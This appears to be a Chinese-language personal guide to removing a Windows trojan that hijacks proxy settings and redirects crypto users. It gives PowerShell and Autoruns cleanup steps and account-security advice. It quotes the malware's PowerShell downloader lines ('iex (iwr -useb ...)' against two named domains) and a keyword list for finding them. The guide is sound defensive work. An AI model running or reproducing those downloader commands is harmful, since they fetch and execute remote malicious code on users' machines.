1. 檢查本機的 DNS 伺服器設定 (最有可能)
惡意程式通常會竄改您網卡的 DNS,讓您在輸入正確網址(如 youtube.com)時,被導向駭客架設的假網頁伺服器。
按
Win + R開啟執行視窗,輸入ncpa.cpl並按 Enter。找到您目前正在上網的網路連線(Wi-Fi 或乙太網路),按右鍵選擇「內容」。
在清單中找到並雙擊「網際網路通訊協定第 4 版 (TCP/IPv4)」。
查看下方是否被選取了「使用下列的 DNS 伺服器位址」並填入了不明的 IP。
2. 檢查 Windows Hosts 檔案
有些流氓軟體會直接修改 Windows 系統底層的網址對應表。
開啟檔案總管,前往:
C:\Windows\System32\drivers\etc使用「記事本」開啟名為
hosts的檔案。檢查檔案最下方,是否有任何將
google.com、youtube.com或binance.com對應到奇怪 IP 位址的設定。解法: 如果有,請將那些行刪除,然後存檔(您可能需要將記事本以「系統管理員身分」執行才能存檔)。
3. 檢查您的路由器 (如果手機連同一個 Wi-Fi 也會這樣)
如果您發現不僅是電腦,連手機連上家裡同一個 Wi-Fi 時,開網頁也會被導向這個畫面,那表示您的 Wi-Fi 路由器已經被駭客入侵並竄改了 DNS。
解法: 您需要登入路由器的管理後台(通常是
192.168.0.1或192.168.1.1),檢查 WAN/LAN 設定中的 DNS 是否被改為不明位址。建議直接將路由器恢復原廠設定 (Reset),並更改路由器的管理密碼。
4. 檢查區域網路 (LAN) 與 Proxy 腳本
很多惡意軟體不會修改 DNS,而是塞入一個隱藏的「自動設定指令碼 (PAC)」,讓您的網頁流量全部繞道去駭客的伺服器。
按
Win + R開啟執行視窗,輸入inetcpl.cpl並按 Enter,開啟「網際網路內容」。切換到最右邊的 「連線」 分頁。
點擊下方的 「區域網路設定 (LAN settings)」。
關鍵檢查: 確認 不要勾選「使用自動設定指令碼」或「為您的區域網路使用 Proxy 伺服器」。這個視窗裡應該只要勾選最上方的「自動偵測設定」即可。如果有被勾選並填入奇怪的網址,請取消勾選並按確定。
5. 重設網路通訊協定 (Winsock) 與清除 DNS 快取
如果 Windows 底層的網路介面被植入了惡意攔截器(LSP 劫持),常規的設定畫面是看不出來的,我們需要從指令列將網路底層重置。
點擊 Windows 開始按鈕,搜尋
cmd。在「命令提示字元」上按右鍵,選擇 「以系統管理員身分執行」。
輸入以下指令並按 Enter 執行:
netsh winsock reset接著輸入以下指令並按 Enter 執行:
ipconfig /flushdns完成後,請將電腦重新開機,再測試看看網頁是否恢復正常。
6. 檢查瀏覽器捷徑是否被「加料」
有時候設定都是正常的,但惡意軟體修改了您桌面或工作列上的瀏覽器捷徑,讓瀏覽器啟動時自動掛載惡意指令。
在桌面或工作列的 Chrome / Edge 圖示上按右鍵。
再對著選單裡的 Google Chrome / Microsoft Edge 按右鍵,選擇 「內容」。
檢查 「目標 (Target)」 欄位。正常情況下,路徑應該以
chrome.exe"或msedge.exe"結尾。如果引號後面被偷偷加上了類似
--proxy-server=...或一段奇怪的網址,請將那些多出來的字元刪除,然後點擊「套用」。
步驟一:立即解除 Proxy 攔截
在「區域網路 (LAN) 設定」視窗中,取消勾選「為您的 LAN 使用 Proxy 伺服器」。
確保只勾選最上面的「自動偵測設定」。
點擊「確定」後,再點擊「套用」。
注意:做完這步後,應該會暫時恢復正常,可以上 Google 了。但如果不把惡意程式殺掉,它過一陣子或重開機後,很可能會自己再把這個 Proxy 勾回來。
步驟二:找出並終止惡意處理程序
既然我們知道惡意程式躲在連接埠 59104,我們就可以用指令把它揪出來:
點擊 Windows 開始按鈕,搜尋
cmd。在「命令提示字元」上按右鍵,選擇「以系統管理員身分執行」。
輸入以下指令並按 Enter:
netstat -ano | findstr 59104您會看到一行結果,最右邊會有一組數字(例如
8732),這就是該惡意程式的處理程序識別碼 (PID)。按
Ctrl + Shift + Esc打開「工作管理員」。切換到左側的「詳細資料」分頁。
點擊上方的「PID」欄位來排序,找到剛剛那組數字。
看看這個 PID 對應的是什麼名稱的執行檔(.exe)。找到後,對它按右鍵選擇「開啟檔案位置」(記下這個惡意檔案藏在哪裡),然後再對它按右鍵選擇「結束工作」。
一、症狀
這類感染常見症狀:
1. Windows Proxy 被自動打開
2. 瀏覽器被導向奇怪網站
3. 要求登入 Binance / 幣安 / 加密貨幣帳號
4. C:\Windows\System32 裡出現奇怪資料夾
5. 刪掉後重開機又回來
6. Defender / Malwarebytes 一開始可能掃不到
本案例中的惡意資料夾名稱類似:
C:\Windows\System32\OSSoftwareInstallerLatest-07jn5i
裡面可能有:
node.exe
app.js
preload.js
*.node
整理一次實際遇到的 Windows 木馬清除經驗。這類病毒的特徵是:你看到惡意資料夾、奇怪的 node.exe,甚至手動刪掉後,重開機或連網後又會自動回來。
真正的問題通常不是那個檔案本身,而是背後有排程工作、PowerShell downloader、Defender 排除項等持久化機制。只刪檔案不會乾淨,必須把「讓它復活的機制」一起刪掉。
二、先斷網
第一步,先拔網路線或關閉 Wi-Fi。
原因是這類木馬可能會透過 PowerShell 重新下載 payload。斷網可以避免它繼續下載惡意檔案或回傳資料。
三、下載並執行 Autoruns
用另一台乾淨電腦下載 Microsoft Sysinternals Autoruns,然後複製到中毒電腦。
在中毒電腦上:
Autoruns64.exe → 右鍵 → 以系統管理員身分執行
等待 Autoruns 掃描完成。
四、搜尋可疑排程與啟動項
在 Autoruns 裡按:
Ctrl + F
搜尋以下關鍵字:
OSSoftwareInstaller
node.exe
powershell
iwr
iex
westgroupfields
cloudsmeadow
本案例中找到的關鍵持久化點是排程工作:
Microsoft\Windows\Integrity\OSSoftwareInstallerLatest-07jn5i
內容含 PowerShell 下載器,例如:
iex (iwr -useb westgroupfields.com)
iex (iwr -useb cloudsmeadow.info)
這就是病毒會「刪掉又回來」的原因。
五、刪除惡意排程
可以在 Autoruns 裡直接取消勾選或刪除可疑項目。
也可以用系統管理員 PowerShell 查詢:
Get-ScheduledTask | Where-Object {
$_.TaskName -match "OSSoftwareInstaller" -or
$_.TaskPath -match "Integrity"
}
確認看到可疑排程後刪除:
Unregister-ScheduledTask `
-TaskPath "\Microsoft\Windows\Integrity\" `
-TaskName "OSSoftwareInstallerLatest-07jn5i" `
-Confirm:$false
如果 TaskName 不完全相同,請以實際看到的名稱為準。
六、結束可疑程序並刪除惡意資料夾
先檢查是否有相關程序在執行:
Get-Process | Where-Object {
$_.ProcessName -match "node|powershell|Updater"
}
如果看到可疑的 node.exe 或奇怪的 Updater.exe,可以先結束:
Stop-Process -Name node -Force -ErrorAction SilentlyContinue
然後刪除惡意資料夾:
Remove-Item "C:\Windows\System32\OSSoftwareInstallerLatest-07jn5i" -Recurse -Force
如果資料夾名稱不同,請改成實際看到的名稱。
七、清除 Windows Defender 排除項
這類木馬可能會把 Windows Defender 的排除項打開,讓 Defender 不掃它。
先查看 Defender 排除項:
Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess
如果看到類似以下內容,就很可疑:
C:\WINDOWS\system32
powershell.EXE
C:\Users\<user>\1
C:\Program Files\Virtual Desktop Streamer\Updater.exe
移除可疑排除項:
Remove-MpPreference -ExclusionPath "C:\WINDOWS\system32" -ErrorAction SilentlyContinue
Remove-MpPreference -ExclusionPath "C:\Users\$env:USERNAME\1" -ErrorAction SilentlyContinue
Remove-MpPreference -ExclusionProcess "powershell.EXE" -ErrorAction SilentlyContinue
再次確認:
Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess
理想狀態是排除項清空,或至少沒有可疑項目。
八、重設 Proxy
這類病毒常會修改 Windows Proxy。
可以先到 Windows 設定確認:
設定 → 網路和網際網路 → Proxy
關閉:
使用 Proxy 伺服器
也可以用指令重設:
netsh winhttp reset proxy
再檢查目前使用者的 Proxy 設定:
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" |
Select ProxyEnable, ProxyServer
如果 ProxyEnable 是 1,可以關閉:
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name ProxyEnable -Value 0
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name ProxyServer -ErrorAction SilentlyContinue
九、更新 Defender 並掃描
先更新 Windows Defender 病毒碼:
Update-MpSignature
執行完整掃描:
Start-MpScan -ScanType FullScan
再執行 Defender Offline Scan:
Start-MpWDOScan
電腦會重開機並進行離線掃描。
十、檢查 Defender 偵測紀錄
掃描後可以查看 Defender 偵測紀錄:
Get-MpThreat | Format-List *
以及:
Get-MpThreatDetection | Format-List *
本案例中後來看到的偵測名稱包含:
Trojan:Win32/Malgent
Trojan:PowerShell/JSCeal.AIVB!ams
VirTool:Win32/DefenderTamperingRestore
HackTool:Win32/WebBrowserPassView
其中一個可疑 installer 是:
C:\Users\<user>\Downloads\x64-v58.833.6-install.exe
C:\Users\<user>\Downloads\x64-v58.833.6-install (1).exe
C:\Users\<user>\Downloads\x64-v58.833.6-install (2).exe
後續 payload 則出現在:
C:\Users\<user>\1\Updater.exe
十一、檢查隔離區,不要還原
查看 Defender 隔離清單:
& "$env:ProgramData\Microsoft\Windows Defender\Platform\$((Get-ChildItem "$env:ProgramData\Microsoft\Windows Defender\Platform" | Sort-Object Name -Descending | Select-Object -First 1).Name)\MpCmdRun.exe" -Restore -ListAll
如果看到病毒檔案已被隔離,例如:
x64-v58.833.6-install.exe
x64-v58.833.6-install (1).exe
x64-v58.833.6-install (2).exe
不要還原,不要執行。
保留隔離狀態即可。
十二、重開機驗證
清除後重開機,確認以下事項:
- 惡意資料夾沒有回來。
- Proxy 沒有自動打開。
- Autoruns 沒有可疑排程。
- Defender 排除項沒有可疑項目。
- 瀏覽器沒有再被導向奇怪網站。
再次檢查排程:
Get-ScheduledTask | Where-Object {
$_.TaskName -match "OSSoftwareInstaller" -or
$_.TaskPath -match "Integrity"
}
如果沒有輸出,代表該排程已清除。
十三、帳號安全處理
因為本案例出現 WebBrowserPassView 類偵測,代表可能涉及瀏覽器密碼或憑證竊取風險。
建議用乾淨裝置處理以下事項:
- 更改 Google 密碼。
- 更改 Microsoft / Apple 密碼。
- 更改 Binance / 交易所密碼。
- 更改銀行、券商、信用卡相關帳號密碼。
- 檢查 Google 最近登入裝置。
- 登出所有不明裝置。
- 檢查 Binance API Key、提款白名單、裝置管理。
- 開啟或重設 2FA。
Chrome / Edge 內儲存過的重要密碼,建議全部視為可能外洩,重新設定。
十四、判斷是否清乾淨
可以暫時認為清除成功的條件:
- 重開機後惡意資料夾沒有重生。
- Proxy 不再自動被打開。
- Defender 排除項已清除。
- Autoruns 沒有可疑排程。
- Defender Full Scan / Offline Scan 沒有新威脅。
Get-MpThreatDetection顯示ActionSuccess=True。- 連網後觀察一段時間沒有復發。
本案例感染鏈整理
可疑 installer:
x64-v58.833.6-install.exe
後續 payload:
C:\Users\<user>\1\Updater.exe
惡意行為:
PowerShell downloader
Defender tampering
新增 Defender exclusion
建立 Scheduled Task
System32 內建立 Node.js payload
修改 Windows Proxy
導向 Binance / 加密貨幣相關頁面
最重要觀念
不要只刪 node.exe 或惡意資料夾。
真正要處理的是:
Scheduled Task
PowerShell Downloader
Defender Exclusion
Proxy 設定
後續 payload
否則資料夾刪掉後,排程下一次又會把它下載回來。
這類感染的重點不是「看到什麼檔案就刪什麼檔案」,而是要找到誰讓它復活。Autoruns 在這種情況下非常有用,因為它可以把啟動項、排程、服務、常駐機制一次攤開來看。
提醒:以上內容是針對本案例整理出的處理流程。不同感染可能有不同檔名、路徑與排程名稱。操作前請確認自己看到的項目確實可疑,不要任意刪除正常系統檔案。如果不確定,建議先備份重要資料,或請熟悉 Windows 安全的人協助判斷。







照片侯補
